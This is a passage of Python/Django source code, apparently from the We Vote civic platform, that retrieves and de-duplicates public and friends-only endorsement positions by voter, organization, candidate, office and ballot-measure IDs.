candidate_campaign_we_vote_id = ''
contest_measure_we_vote_id = ''
position_manager = PositionManager()
return position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
office_id, candidate_campaign_id, contest_measure_id,
voter_we_vote_id, contest_office_we_vote_id, candidate_campaign_we_vote_id, contest_measure_we_vote_id,
google_civic_election_id)
def retrieve_organization_candidate_campaign_position_with_we_vote_id(self, organization_id,
candidate_campaign_we_vote_id,
google_civic_election_id=False,
state_code=False):
"""
Find a position based on the organization_id & candidate_campaign_we_vote_id
:param organization_id:
:param candidate_campaign_we_vote_id:
:param google_civic_election_id:
:param state_code:
:return:
"""
organization_we_vote_id = ''
position_we_vote_id = ''
voter_id = 0
office_id = 0
contest_measure_id = 0
voter_we_vote_id = ''
contest_office_we_vote_id = ''
candidate_campaign_id = 0
contest_measure_we_vote_id = ''
position_manager = PositionManager()
return position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
office_id, candidate_campaign_id, contest_measure_id,
voter_we_vote_id, contest_office_we_vote_id, candidate_campaign_we_vote_id, contest_measure_we_vote_id,
google_civic_election_id)
def retrieve_organization_contest_measure_position(self, organization_id, contest_measure_id,
google_civic_election_id=False, state_code=False):
"""
Find a position based on the organization_id & contest_measure_id
:param organization_id:
:param contest_measure_id:
:param google_civic_election_id:
:param state_code:
:return:
"""
organization_we_vote_id = ''
position_we_vote_id = ''
voter_id = 0
office_id = 0
candidate_campaign_id = 0
voter_we_vote_id = ''
contest_office_we_vote_id = ''
candidate_campaign_we_vote_id = ''
contest_measure_we_vote_id = ''
position_manager = PositionManager()
return position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
office_id, candidate_campaign_id, contest_measure_id,
voter_we_vote_id, contest_office_we_vote_id, candidate_campaign_we_vote_id, contest_measure_we_vote_id,
google_civic_election_id)
def retrieve_organization_contest_measure_position_with_we_vote_id(self, organization_id,
contest_measure_we_vote_id,
google_civic_election_id=False,
state_code=False):
"""
Find a position based on the organization_id & contest_measure_we_vote_id
:param organization_id:
:param contest_measure_we_vote_id:
:param google_civic_election_id:
:param state_code:
:return:
"""
organization_we_vote_id = ''
position_we_vote_id = ''
voter_id = 0
office_id = 0
contest_measure_id = 0
voter_we_vote_id = ''
contest_office_we_vote_id = ''
candidate_campaign_id = 0
candidate_campaign_we_vote_id = ''
position_manager = PositionManager()
return position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
office_id, candidate_campaign_id, contest_measure_id,
voter_we_vote_id, contest_office_we_vote_id, candidate_campaign_we_vote_id, contest_measure_we_vote_id,
google_civic_election_id)
def retrieve_voter_contest_office_position(self, voter_id, office_id):
organization_id = 0
organization_we_vote_id = ''
position_we_vote_id = ''
candidate_campaign_id = 0
contest_measure_id = 0
position_manager = PositionManager()
return position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
office_id, candidate_campaign_id, contest_measure_id)
def retrieve_voter_contest_office_position_with_we_vote_id(self, voter_id, contest_office_we_vote_id):
organization_id = 0
organization_we_vote_id = ''
position_we_vote_id = ''
office_id = 0
candidate_campaign_id = 0
contest_measure_id = 0
voter_we_vote_id = ""
candidate_campaign_we_vote_id = ''
contest_measure_we_vote_id = ''
position_manager = PositionManager()
return position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
office_id, candidate_campaign_id, contest_measure_id,
voter_we_vote_id, contest_office_we_vote_id, candidate_campaign_we_vote_id, contest_measure_we_vote_id
)
def retrieve_voter_candidate_campaign_position(self, voter_id, candidate_campaign_id):
organization_id = 0
organization_we_vote_id = ''
position_we_vote_id = ''
office_id = 0
contest_measure_id = 0
position_manager = PositionManager()
return position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
office_id, candidate_campaign_id, contest_measure_id)
def retrieve_voter_candidate_campaign_position_with_we_vote_id(self, voter_id, candidate_campaign_we_vote_id):
organization_id = 0
organization_we_vote_id = ''
position_we_vote_id = ''
office_id = 0
candidate_campaign_id = 0
contest_measure_id = 0
voter_we_vote_id = ''
contest_office_we_vote_id = ''
contest_measure_we_vote_id = ''
position_manager = PositionManager()
return position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
office_id, candidate_campaign_id, contest_measure_id,
voter_we_vote_id, contest_office_we_vote_id, candidate_campaign_we_vote_id, contest_measure_we_vote_id
)
def retrieve_voter_contest_measure_position(self, voter_id, contest_measure_id):
organization_id = 0
organization_we_vote_id = ''
position_we_vote_id = ''
office_id = 0
candidate_campaign_id = 0
position_manager = PositionManager()
return position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
office_id, candidate_campaign_id, contest_measure_id)
def retrieve_voter_contest_measure_position_with_we_vote_id(self, voter_id, contest_measure_we_vote_id):
organization_id = 0
organization_we_vote_id = ''
position_we_vote_id = ''
office_id = 0
candidate_campaign_id = 0
contest_measure_id = 0
voter_we_vote_id = ''
contest_office_we_vote_id = ''
candidate_campaign_we_vote_id = ''
position_manager = PositionManager()
return position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
office_id, candidate_campaign_id, contest_measure_id,
voter_we_vote_id, contest_office_we_vote_id, candidate_campaign_we_vote_id, contest_measure_we_vote_id
)
def retrieve_position_from_we_vote_id(self, position_we_vote_id):
organization_id = 0
organization_we_vote_id = ''
voter_id = 0
office_id = 0
candidate_campaign_id = 0
contest_measure_id = 0
position_manager = PositionManager()
return position_manager.retrieve_position_table_unknown(
position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
office_id, candidate_campaign_id, contest_measure_id)
def retrieve_position_table_unknown(self, position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
contest_office_id, candidate_campaign_id, contest_measure_id,
voter_we_vote_id='', contest_office_we_vote_id='',
candidate_campaign_we_vote_id='', contest_measure_we_vote_id='',
google_civic_election_id=False, vote_smart_time_span=False):
# Check public positions first
retrieve_position_for_friends = False
results = self.retrieve_position(position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
contest_office_id, candidate_campaign_id, contest_measure_id,
retrieve_position_for_friends,
voter_we_vote_id, contest_office_we_vote_id, candidate_campaign_we_vote_id,
contest_measure_we_vote_id,
google_civic_election_id, vote_smart_time_span)
if results['position_found']:
return results
# If a public position wasn't found, now check for private position
retrieve_position_for_friends = True
return self.retrieve_position(position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
contest_office_id, candidate_campaign_id, contest_measure_id,
retrieve_position_for_friends,
voter_we_vote_id, contest_office_we_vote_id, candidate_campaign_we_vote_id,
contest_measure_we_vote_id,
google_civic_election_id, vote_smart_time_span)
def merge_position_duplicates_voter_candidate_campaign_position(self, voter_id, candidate_campaign_id,
retrieve_position_for_friends):
organization_id = 0
organization_we_vote_id = ''
position_we_vote_id = ''
office_id = 0
contest_measure_id = 0
position_manager = PositionManager()
return position_manager.merge_position_duplicates(
position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
office_id, candidate_campaign_id, contest_measure_id, retrieve_position_for_friends)
def merge_position_duplicates_voter_candidate_campaign_position_with_we_vote_id(
self, voter_id, candidate_campaign_we_vote_id, retrieve_position_for_friends):
organization_id = 0
organization_we_vote_id = ''
position_we_vote_id = ''
office_id = 0
candidate_campaign_id = 0
contest_measure_id = 0
voter_we_vote_id = ''
contest_office_we_vote_id = ''
contest_measure_we_vote_id = ''
position_manager = PositionManager()
return position_manager.merge_position_duplicates(
position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
office_id, candidate_campaign_id, contest_measure_id, retrieve_position_for_friends,
voter_we_vote_id, contest_office_we_vote_id, candidate_campaign_we_vote_id, contest_measure_we_vote_id
)
def merge_position_duplicates_voter_contest_measure_position(self, voter_id, contest_measure_id,
retrieve_position_for_friends):
organization_id = 0
organization_we_vote_id = ''
position_we_vote_id = ''
office_id = 0
candidate_campaign_id = 0
position_manager = PositionManager()
return position_manager.merge_position_duplicates(
position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
office_id, candidate_campaign_id, contest_measure_id, retrieve_position_for_friends)
def merge_position_duplicates_voter_contest_measure_position_with_we_vote_id(
self, voter_id, contest_measure_we_vote_id, retrieve_position_for_friends):
organization_id = 0
organization_we_vote_id = ''
position_we_vote_id = ''
office_id = 0
candidate_campaign_id = 0
contest_measure_id = 0
voter_we_vote_id = ''
contest_office_we_vote_id = ''
candidate_campaign_we_vote_id = ''
position_manager = PositionManager()
return position_manager.merge_position_duplicates(
position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
office_id, candidate_campaign_id, contest_measure_id, retrieve_position_for_friends,
voter_we_vote_id, contest_office_we_vote_id, candidate_campaign_we_vote_id, contest_measure_we_vote_id
)
def merge_position_duplicates(self, position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
contest_office_id, candidate_campaign_id, contest_measure_id,
retrieve_position_for_friends=False,
voter_we_vote_id='', contest_office_we_vote_id='', candidate_campaign_we_vote_id='',
contest_measure_we_vote_id='',
google_civic_election_id=False, state_code=False, vote_smart_time_span=False):
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
duplicates_found = False
status = ""
success = False
is_public_position = None
if retrieve_position_for_friends:
duplicates_list_starter = PositionForFriends
duplicates_list = []
status += "MERGE_POSITION_DUPLICATES-FRIENDS "
else:
duplicates_list_starter = PositionEntered
duplicates_list = []
status += "MERGE_POSITION_DUPLICATES-PUBLIC "
if positive_value_exists(organization_we_vote_id) and not positive_value_exists(organization_id):
# Look up the organization_id
organization_manager = OrganizationManager()
organization_id = organization_manager.fetch_organization_id(organization_we_vote_id)
if positive_value_exists(voter_we_vote_id) and not positive_value_exists(voter_id):
# Look up the voter_id
voter_manager = VoterManager()
voter_id = voter_manager.fetch_local_id_from_we_vote_id(voter_we_vote_id)
try:
if positive_value_exists(position_we_vote_id):
status += "MERGE_POSITION_DUPLICATES_WITH_WE_VOTE_ID "
duplicates_list = duplicates_list_starter.objects.filter(
we_vote_id__iexact=position_we_vote_id)
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
# ###############################
# Organization
elif positive_value_exists(organization_id) and positive_value_exists(contest_office_id):
if positive_value_exists(google_civic_election_id):
status += "MERGE_POSITION_DUPLICATES_WITH_ORG_OFFICE_AND_ELECTION "
duplicates_list = duplicates_list_starter.objects.filter(
organization_id=organization_id, contest_office_id=contest_office_id,
google_civic_election_id=google_civic_election_id)
# If still here, we found an existing position
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
elif positive_value_exists(vote_smart_time_span):
status += "MERGE_POSITION_DUPLICATES_WITH_ORG_OFFICE_AND_VOTE_SMART_TIME_SPAN "
duplicates_list = duplicates_list_starter.objects.filter(
organization_id=organization_id, contest_office_id=contest_office_id,
vote_smart_time_span__iexact=vote_smart_time_span)
# If still here, we found an existing position
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
else:
status += "MERGE_POSITION_DUPLICATES_WITH_ORG_AND_OFFICE "
duplicates_list = duplicates_list_starter.objects.filter(
organization_id=organization_id, contest_office_id=contest_office_id)
# If still here, we found an existing position
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
elif positive_value_exists(organization_id) and positive_value_exists(candidate_campaign_id):
if positive_value_exists(google_civic_election_id):
status += "MERGE_POSITION_DUPLICATES_WITH_ORG_CANDIDATE_AND_ELECTION "
duplicates_list = duplicates_list_starter.objects.filter(
organization_id=organization_id, candidate_campaign_id=candidate_campaign_id,
google_civic_election_id=google_civic_election_id)
# If still here, we found an existing position
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
elif positive_value_exists(vote_smart_time_span):
status += "MERGE_POSITION_DUPLICATES_WITH_ORG_CANDIDATE_AND_VOTE_SMART_TIME_SPAN "
duplicates_list = duplicates_list_starter.objects.filter(
organization_id=organization_id, candidate_campaign_id=candidate_campaign_id,
vote_smart_time_span__iexact=vote_smart_time_span)
# If still here, we found an existing position
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
else:
status += "MERGE_POSITION_DUPLICATES_WITH_ORG_AND_CANDIDATE "
duplicates_list = duplicates_list_starter.objects.filter(
organization_id=organization_id, candidate_campaign_id=candidate_campaign_id)
# If still here, we found an existing position
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
elif positive_value_exists(organization_id) and positive_value_exists(candidate_campaign_we_vote_id):
if positive_value_exists(google_civic_election_id):
status += "MERGE_POSITION_DUPLICATES_WITH_ORG_CANDIDATE_WE_VOTE_ID_AND_ELECTION "
duplicates_list = duplicates_list_starter.objects.filter(
organization_id=organization_id,
candidate_campaign_we_vote_id__iexact=candidate_campaign_we_vote_id,
google_civic_election_id=google_civic_election_id)
# If still here, we found an existing position
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
elif positive_value_exists(vote_smart_time_span):
status += "MERGE_POSITION_DUPLICATES_WITH_ORG_CANDIDATE_WE_VOTE_ID_AND_VOTE_SMART_TIME_SPAN "
duplicates_list = duplicates_list_starter.objects.filter(
organization_id=organization_id,
candidate_campaign_we_vote_id__iexact=candidate_campaign_we_vote_id,
vote_smart_time_span__iexact=vote_smart_time_span)
# If still here, we found an existing position
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
else:
status += "MERGE_POSITION_DUPLICATES_WITH_ORG_AND_CANDIDATE_WE_VOTE_ID "
duplicates_list = duplicates_list_starter.objects.filter(
organization_id=organization_id,
candidate_campaign_we_vote_id__iexact=candidate_campaign_we_vote_id)
# If still here, we found an existing position
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
elif positive_value_exists(organization_id) and positive_value_exists(contest_measure_id):
if positive_value_exists(google_civic_election_id):
status += "MERGE_POSITION_DUPLICATES_WITH_ORG_MEASURE_AND_ELECTION "
duplicates_list = duplicates_list_starter.objects.filter(
organization_id=organization_id, contest_measure_id=contest_measure_id,
google_civic_election_id=google_civic_election_id)
# If still here, we found an existing position
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
elif positive_value_exists(vote_smart_time_span):
status += "MERGE_POSITION_DUPLICATES_WITH_ORG_MEASURE_AND_VOTE_SMART_TIME_SPAN "
duplicates_list = duplicates_list_starter.objects.filter(
organization_id=organization_id, contest_measure_id=contest_measure_id,
vote_smart_time_span__iexact=vote_smart_time_span)
# If still here, we found an existing position
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
else:
status += "MERGE_POSITION_DUPLICATES_WITH_ORG_AND_MEASURE "
duplicates_list = duplicates_list_starter.objects.filter(
organization_id=organization_id, contest_measure_id=contest_measure_id)
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
elif positive_value_exists(organization_id) and positive_value_exists(contest_measure_we_vote_id):
if positive_value_exists(google_civic_election_id):
status += "MERGE_POSITION_DUPLICATES_WITH_ORG_MEASURE_WE_VOTE_ID_AND_ELECTION "
duplicates_list = duplicates_list_starter.objects.filter(
organization_id=organization_id,
contest_measure_we_vote_id__iexact=contest_measure_we_vote_id,
google_civic_election_id=google_civic_election_id)
# If still here, we found an existing position
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
elif positive_value_exists(vote_smart_time_span):
status += "MERGE_POSITION_DUPLICATES_WITH_ORG_MEASURE_WE_VOTE_ID_AND_VOTE_SMART_TIME_SPAN "
duplicates_list = duplicates_list_starter.objects.filter(
organization_id=organization_id,
contest_measure_we_vote_id__iexact=contest_measure_we_vote_id,
vote_smart_time_span__iexact=vote_smart_time_span)
# If still here, we found an existing position
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
else:
status += "MERGE_POSITION_DUPLICATES_WITH_ORG_AND_MEASURE_WE_VOTE_ID "
duplicates_list = duplicates_list_starter.objects.filter(
organization_id=organization_id, contest_measure_we_vote_id__iexact=contest_measure_we_vote_id)
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
# ###############################
# Voter
elif positive_value_exists(voter_id) and positive_value_exists(contest_office_id):
status += "MERGE_POSITION_DUPLICATES_WITH_VOTER_AND_OFFICE "
duplicates_list = duplicates_list_starter.objects.filter(
voter_id=voter_id, contest_office_id=contest_office_id)
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
elif positive_value_exists(voter_id) and positive_value_exists(contest_office_we_vote_id):
status += "MERGE_POSITION_DUPLICATES_WITH_VOTER_AND_OFFICE_WE_VOTE_ID "
duplicates_list = duplicates_list_starter.objects.filter(
voter_id=voter_id, contest_office_we_vote_id__iexact=contest_office_we_vote_id)
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
elif positive_value_exists(voter_id) and positive_value_exists(candidate_campaign_id):
status += "MERGE_POSITION_DUPLICATES_WITH_VOTER_AND_CANDIDATE "
duplicates_list = duplicates_list_starter.objects.filter(
voter_id=voter_id, candidate_campaign_id=candidate_campaign_id)
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
elif positive_value_exists(voter_id) and positive_value_exists(candidate_campaign_we_vote_id):
status += "MERGE_POSITION_DUPLICATES_WITH_VOTER_AND_CANDIDATE_WE_VOTE_ID "
duplicates_list = duplicates_list_starter.objects.filter(
voter_id=voter_id, candidate_campaign_we_vote_id__iexact=candidate_campaign_we_vote_id)
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
elif positive_value_exists(voter_id) and positive_value_exists(contest_measure_id):
status += "MERGE_POSITION_DUPLICATES_WITH_VOTER_AND_MEASURE "
duplicates_list = duplicates_list_starter.objects.filter(
voter_id=voter_id, contest_measure_id=contest_measure_id)
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
elif positive_value_exists(voter_id) and positive_value_exists(contest_measure_we_vote_id):
status += "MERGE_POSITION_DUPLICATES_WITH_VOTER_AND_MEASURE_WE_VOTE_ID "
duplicates_list = duplicates_list_starter.objects.filter(
voter_id=voter_id, contest_measure_we_vote_id__iexact=contest_measure_we_vote_id)
duplicates_count = len(duplicates_list)
duplicates_found = True if duplicates_count > 1 else False
success = True
else:
status += "MERGE_POSITION_DUPLICATES_INSUFFICIENT_VARIABLES "
except ObjectDoesNotExist:
error_result = False
exception_does_not_exist = True
success = True
status += "MERGE_POSITION_DUPLICATES_NONE_FOUND "
if retrieve_position_for_friends:
duplicates_list = []
is_public_position = False
else:
duplicates_list = []
is_public_position = True
duplicates_repaired = False
if duplicates_found:
first_position = True
duplicates_repaired = True
for position in duplicates_list:
if first_position:
position_to_keep = position
first_position = False
continue
else:
results = self.merge_position_visibility(position_to_keep, position)
if results['success']:
position_to_keep = results['position']
else:
duplicates_repaired = False
break
if retrieve_position_for_friends:
is_public_position = False
else:
is_public_position = True
results = {
'success': success,
'status': status,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'duplicates_found': duplicates_found,
'duplicates_repaired': duplicates_repaired,
'duplicates_list': duplicates_list,
'google_civic_election_id': google_civic_election_id,
'state_code': state_code,
}
return results
def retrieve_position(self, position_we_vote_id, organization_id, organization_we_vote_id, voter_id,
contest_office_id, candidate_campaign_id, contest_measure_id,
retrieve_position_for_friends=False,
voter_we_vote_id='', contest_office_we_vote_id='', candidate_campaign_we_vote_id='',
contest_measure_we_vote_id='',
google_civic_election_id=False, vote_smart_time_span=False):
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
position_found = False
status = ""
success = False
if retrieve_position_for_friends:
position_on_stage_starter = PositionForFriends
position_on_stage = PositionForFriends()
status += "RETRIEVE_POSITION-FRIENDS "
else:
position_on_stage_starter = PositionEntered
position_on_stage = PositionEntered()
status += "RETRIEVE_POSITION-PUBLIC "
if positive_value_exists(organization_we_vote_id) and not positive_value_exists(organization_id):
# Look up the organization_id
organization_manager = OrganizationManager()
organization_id = organization_manager.fetch_organization_id(organization_we_vote_id)
if positive_value_exists(voter_we_vote_id) and not positive_value_exists(voter_id):
# Look up the voter_id
voter_manager = VoterManager()
voter_id = voter_manager.fetch_local_id_from_we_vote_id(voter_we_vote_id)
try:
if positive_value_exists(position_we_vote_id):
status += "RETRIEVE_POSITION_FOUND_WITH_WE_VOTE_ID "
position_on_stage = position_on_stage_starter.objects.get(we_vote_id__iexact=position_we_vote_id)
position_found = True
success = True
# ###############################
# Organization
elif positive_value_exists(organization_id) and positive_value_exists(contest_office_id):
if positive_value_exists(google_civic_election_id):
status += "RETRIEVE_POSITION_FOUND_WITH_ORG_OFFICE_AND_ELECTION "
position_on_stage = position_on_stage_starter.objects.get(
organization_id=organization_id, contest_office_id=contest_office_id,
google_civic_election_id=google_civic_election_id)
# If still here, we found an existing position
position_found = True
success = True
elif positive_value_exists(vote_smart_time_span):
status += "RETRIEVE_POSITION_FOUND_WITH_ORG_OFFICE_AND_VOTE_SMART_TIME_SPAN "
position_on_stage = position_on_stage_starter.objects.get(
organization_id=organization_id, contest_office_id=contest_office_id,
vote_smart_time_span__iexact=vote_smart_time_span)
# If still here, we found an existing position
position_found = True
success = True
else:
status += "RETRIEVE_POSITION_FOUND_WITH_ORG_AND_OFFICE "
position_on_stage = position_on_stage_starter.objects.get(
organization_id=organization_id, contest_office_id=contest_office_id)
# If still here, we found an existing position
position_found = True
success = True
elif positive_value_exists(organization_id) and positive_value_exists(candidate_campaign_id):
if positive_value_exists(google_civic_election_id):
status += "RETRIEVE_POSITION_FOUND_WITH_ORG_CANDIDATE_AND_ELECTION "
position_on_stage = position_on_stage_starter.objects.get(
organization_id=organization_id, candidate_campaign_id=candidate_campaign_id,
google_civic_election_id=google_civic_election_id)
# If still here, we found an existing position
position_found = True
success = True
elif positive_value_exists(vote_smart_time_span):
status += "RETRIEVE_POSITION_FOUND_WITH_ORG_CANDIDATE_AND_VOTE_SMART_TIME_SPAN "
position_on_stage = position_on_stage_starter.objects.get(
organization_id=organization_id, candidate_campaign_id=candidate_campaign_id,
vote_smart_time_span__iexact=vote_smart_time_span)
# If still here, we found an existing position
position_found = True
success = True
else:
status += "RETRIEVE_POSITION_FOUND_WITH_ORG_AND_CANDIDATE "
position_on_stage = position_on_stage_starter.objects.get(
organization_id=organization_id, candidate_campaign_id=candidate_campaign_id)
# If still here, we found an existing position
position_found = True
success = True
elif positive_value_exists(organization_id) and positive_value_exists(candidate_campaign_we_vote_id):
if positive_value_exists(google_civic_election_id):
status += "RETRIEVE_POSITION_FOUND_WITH_ORG_CANDIDATE_WE_VOTE_ID_AND_ELECTION "
position_on_stage = position_on_stage_starter.objects.get(
organization_id=organization_id,
candidate_campaign_we_vote_id__iexact=candidate_campaign_we_vote_id,
google_civic_election_id=google_civic_election_id)
# If still here, we found an existing position
position_found = True
success = True
elif positive_value_exists(vote_smart_time_span):
status += "RETRIEVE_POSITION_FOUND_WITH_ORG_CANDIDATE_WE_VOTE_ID_AND_VOTE_SMART_TIME_SPAN "
position_on_stage = position_on_stage_starter.objects.get(
organization_id=organization_id,
candidate_campaign_we_vote_id__iexact=candidate_campaign_we_vote_id,
vote_smart_time_span__iexact=vote_smart_time_span)
# If still here, we found an existing position
position_found = True
success = True
else:
status += "RETRIEVE_POSITION_FOUND_WITH_ORG_AND_CANDIDATE_WE_VOTE_ID "
position_on_stage = position_on_stage_starter.objects.get(
organization_id=organization_id,
candidate_campaign_we_vote_id__iexact=candidate_campaign_we_vote_id)
# If still here, we found an existing position
position_found = True
success = True
elif positive_value_exists(organization_id) and positive_value_exists(contest_measure_id):
if positive_value_exists(google_civic_election_id):
status += "RETRIEVE_POSITION_FOUND_WITH_ORG_MEASURE_AND_ELECTION "
position_on_stage = position_on_stage_starter.objects.get(
organization_id=organization_id, contest_measure_id=contest_measure_id,
google_civic_election_id=google_civic_election_id)
# If still here, we found an existing position
position_found = True
success = True
elif positive_value_exists(vote_smart_time_span):
status += "RETRIEVE_POSITION_FOUND_WITH_ORG_MEASURE_AND_VOTE_SMART_TIME_SPAN "
position_on_stage = position_on_stage_starter.objects.get(
organization_id=organization_id, contest_measure_id=contest_measure_id,
vote_smart_time_span__iexact=vote_smart_time_span)
# If still here, we found an existing position
position_found = True
success = True
else:
status += "RETRIEVE_POSITION_FOUND_WITH_ORG_AND_MEASURE "
position_on_stage = position_on_stage_starter.objects.get(
organization_id=organization_id, contest_measure_id=contest_measure_id)
position_found = True
success = True
elif positive_value_exists(organization_id) and positive_value_exists(contest_measure_we_vote_id):
if positive_value_exists(google_civic_election_id):
status += "RETRIEVE_POSITION_FOUND_WITH_ORG_MEASURE_WE_VOTE_ID_AND_ELECTION "
position_on_stage = position_on_stage_starter.objects.get(
organization_id=organization_id, contest_measure_we_vote_id__iexact=contest_measure_we_vote_id,
google_civic_election_id=google_civic_election_id)
# If still here, we found an existing position
position_found = True
success = True
elif positive_value_exists(vote_smart_time_span):
status += "RETRIEVE_POSITION_FOUND_WITH_ORG_MEASURE_WE_VOTE_ID_AND_VOTE_SMART_TIME_SPAN "
position_on_stage = position_on_stage_starter.objects.get(
organization_id=organization_id, contest_measure_we_vote_id__iexact=contest_measure_we_vote_id,
vote_smart_time_span__iexact=vote_smart_time_span)
# If still here, we found an existing position
position_found = True
success = True
else:
status += "RETRIEVE_POSITION_FOUND_WITH_ORG_AND_MEASURE_WE_VOTE_ID "
position_on_stage = position_on_stage_starter.objects.get(
organization_id=organization_id, contest_measure_we_vote_id__iexact=contest_measure_we_vote_id)
position_found = True
success = True
# ###############################
# Voter
elif positive_value_exists(voter_id) and positive_value_exists(contest_office_id):
status += "RETRIEVE_POSITION_FOUND_WITH_VOTER_AND_OFFICE "
position_on_stage = position_on_stage_starter.objects.get(
voter_id=voter_id, contest_office_id=contest_office_id)
position_found = True
success = True
elif positive_value_exists(voter_id) and positive_value_exists(contest_office_we_vote_id):
status += "RETRIEVE_POSITION_FOUND_WITH_VOTER_AND_OFFICE_WE_VOTE_ID "
position_on_stage = position_on_stage_starter.objects.get(
voter_id=voter_id, contest_office_we_vote_id__iexact=contest_office_we_vote_id)
position_found = True
success = True
elif positive_value_exists(voter_id) and positive_value_exists(candidate_campaign_id):
status += "RETRIEVE_POSITION_FOUND_WITH_VOTER_AND_CANDIDATE "
position_on_stage = position_on_stage_starter.objects.get(
voter_id=voter_id, candidate_campaign_id=candidate_campaign_id)
position_found = True
success = True
elif positive_value_exists(voter_id) and positive_value_exists(candidate_campaign_we_vote_id):
status += "RETRIEVE_POSITION_FOUND_WITH_VOTER_AND_CANDIDATE_WE_VOTE_ID "
position_on_stage = position_on_stage_starter.objects.get(
voter_id=voter_id, candidate_campaign_we_vote_id__iexact=candidate_campaign_we_vote_id)
position_found = True
success = True
elif positive_value_exists(voter_id) and positive_value_exists(contest_measure_id):
status += "RETRIEVE_POSITION_FOUND_WITH_VOTER_AND_MEASURE "
position_on_stage = position_on_stage_starter.objects.get(
voter_id=voter_id, contest_measure_id=contest_measure_id)
position_found = True
success = True
elif positive_value_exists(voter_id) and positive_value_exists(contest_measure_we_vote_id):
status += "RETRIEVE_POSITION_FOUND_WITH_VOTER_AND_MEASURE_WE_VOTE_ID "
position_on_stage = position_on_stage_starter.objects.get(
voter_id=voter_id, contest_measure_we_vote_id__iexact=contest_measure_we_vote_id)
position_found = True
success = True
else:
status += "RETRIEVE_POSITION_INSUFFICIENT_VARIABLES "
except MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
error_result = True
exception_multiple_object_returned = True
success = False
status += "RETRIEVE_POSITION_MULTIPLE_FOUND "
if retrieve_position_for_friends:
position_on_stage = PositionForFriends()
else:
position_on_stage = PositionEntered()
except ObjectDoesNotExist:
error_result = False
exception_does_not_exist = True
success = True
status += "RETRIEVE_POSITION_NONE_FOUND "
if retrieve_position_for_friends:
position_on_stage = PositionForFriends()
else:
position_on_stage = PositionEntered()
results = {
'success': success,
'status': status,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'position_found': position_found,
'position': position_on_stage,
'is_support': position_on_stage.is_support(),
'is_positive_rating': position_on_stage.is_positive_rating(),
'is_support_or_positive_rating': position_on_stage.is_support_or_positive_rating(),
'is_oppose': position_on_stage.is_oppose(),
'is_negative_rating': position_on_stage.is_negative_rating(),
'is_oppose_or_negative_rating': position_on_stage.is_oppose_or_negative_rating(),
'is_no_stance': position_on_stage.is_no_stance(),
'is_information_only': position_on_stage.is_information_only(),
'is_still_deciding': position_on_stage.is_still_deciding(),
'is_public_position': position_on_stage.is_public_position(),
'date_last_changed': position_on_stage.date_last_changed,
'date_entered': position_on_stage.date_entered,
'google_civic_election_id': google_civic_election_id,
}
return results
def transfer_to_public_position(self, existing_position):
# Check to make sure existing_position comes from PositionForFriends
if not existing_position._meta.object_name == "PositionForFriends":
results = {
'success': False,
'status': "SWITCH_TO_PUBLIC_POSITION_SUCCESS-NOT_PositionForFriends",
'position_copied': False,
'position_deleted': False,
'position': PositionEntered(),
'is_public_position': None,
}
return results
status = ""
# In order to show a position publicly we need to tie the position to either organization_we_vote_id,
# public_figure_we_vote_id or candidate_we_vote_id. For now (2016-8-17) we use only organization
# Heal data: Make sure we have both org id and org we_vote_id
organization_we_vote_id_missing = positive_value_exists(existing_position.organization_id) \
and not positive_value_exists(existing_position.organization_we_vote_id)
